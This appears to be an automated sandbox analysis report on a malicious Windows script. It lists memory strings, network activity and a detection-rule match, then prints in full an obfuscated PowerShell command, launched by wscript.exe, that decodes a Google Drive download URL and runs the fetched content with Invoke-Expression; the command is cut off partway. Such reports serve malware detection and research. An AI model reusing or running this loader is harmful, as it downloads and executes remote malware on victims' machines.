Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: |
Binary string: e.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C843000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D942A24000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: n.pdbfYYo source: powershell.exe, 00000002.00000002.1393917309.000001D95C925000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C8A9000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.1376694378.000001D95C87F000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb_4 source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: t.Automation.pdb source: powershell.exe, 00000002.00000002.1346871388.000001D9429C4000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1394575729.000001D95CB20000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32/ source: powershell.exe, 00000002.00000002.1394575729.000001D95CB8D000.00000004.00000020.00020000.00000000.sdmp |
Source: powershell.exe, 00000002.00000002.1347362979.000001D9466E6000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94671F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000002.00000002.1347362979.000001D9444F1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googP |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94652E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7DeP |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1p8CA5IWVRgggeGBH5Jt5SA7bzDiwA7De&export=download |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.comX1 |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944719000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000002.00000002.1347362979.000001D94587B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000002.00000002.1370143781.000001D9546A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370143781.000001D954562000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D946708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000002.00000002.1347362979.000001D944A2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D946708000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D94670C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1347362979.000001D944A30000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: amsi64_7420.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7420, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Karyokinesis104 = 1;$Unrefracting='Substrin';$Unrefracting+='g';Function Agonothet($Haandgribelige){$Judiciousness=$Haandgribelige.Length-$Karyokinesis104;For($organoleptically=5; $organoleptically -lt $Judiciousness; $organoleptically+=(6)){$Bundlses+=$Haandgribelige.$Unrefracting.Invoke($organoleptically, $Karyokinesis104);}$Bundlses;}function popess($Rdstjerternes){& ($Speecher) ($Rdstjerternes);}$Stentrykkerierne=Agonothet 'SuspiMStaccoUnvigzOverli ,ntolQuainl degeaPaste/Arabi5Strat.In.er0V,cci Petit(mo,igW Und,iD armn C brdRadiooStraawPharys.yldi tilstNAfhjeTCanad Skov1S,edi0 Min..H nds0 Pant;Svend Ne.paWbivaliPaveknPosts6Se,ip4Poro.;Plebi ConatxHuele6 Gras4Servi;Sonny ,ivvarGeckovShipp: Dans1 ulmu2runen1 Pro .br.sn0 Fina)Se vt Unde GForsteDesincHansgkBelonoForh./Epose2atmoc0nedve1Float0Missi0Vigne1Harce0 Gang1Pte o .egynFEndl iKonverPanereKruspf X.loo DistxAbdu./Klass1 Fr.m2Chink1Auten.L.del0Rulle ';$Untestable27=Agonothet ' PolyUTarogs,onheeJobs r,okse-Ted iA OlymgUnhaneSagitnMattetDanse ';$Mblements=Agonothet 'BefryhUn ertGr.fit TagspPul,os.jtad:Macro/T,edo/ Na.udBascurShippiChangvAuxineBegrn. A isgprimeoLovbeo T rng StralGoogoeD fer.EvighcSusp,oFr semDeg,a/AgftauLea hcTppeb?.asimeFlavoxTautop Tremo Natur,irketAgerk=Piet.dVindioSpisewDespinPaakllFishsoEl,esaMo.aidHiela&outgli .lgedRusti=Seign1 udstp Quen8 OverCafblaAKa hi5i.terIShawiWSkovrVAfparRS.icigIntragArrhigRtenjeDemarGLeptoBJo,glHbolst5 S.rjJTillgtGens.5 TermSParosAOvern7Tingeb .kstzStilpDDk,eniAscesw fo.wAColu.7 LazaDFemgreWaggo ';$Gashes=Agonothet 'Vekse> Tlle ';$Speecher=Agonothet 'Gl.cyiTr.nseEkspoxS,ibs ';$Hjemgivelsen='Drfyldingen';popess (Agonothet 'Sam.uSRetateO,pebtDucti-KangaC Li soGrundnEnsomtOzon.eStratnIleitt Dank p.ri-BesaaP Kan.aPrefat Alfah Tora KismTDrmm.:Halm \ UlleC Ghosl Whalu Le.nsDomnetRewineAccesr,necdyLands.fejlutNonauxCamayt.unkt Ubud -BinapVOvermaAkti.l billuUnparePr.in Rubri$JackaHInaprjJer.beAstr,mScenag RolliBand.vRecule AnnalZani.sKobbeeKont,n,ncom; Nonw ');popess (Agonothet 'BrugeiBassefarbej Tour(RestptG auceAnt ssSwerdtRela.-gondopTailgaKontotUsitah Hnge BifokTAksle:Fanci\KnickCFodtulRevoluOr.ogs Af.ot,npreeYngstrV venyBitte.RovdytSalamxOmnortBores)Behan{ Ek.eeChillxTele,i .trut Unl,} Slu ;L,vsf ');$Julegavens = Agonothet ' Bek eSheracUnwirhvr.stoBehnd Unmuz%anke,aOrigepBagr.p .ndhdGy |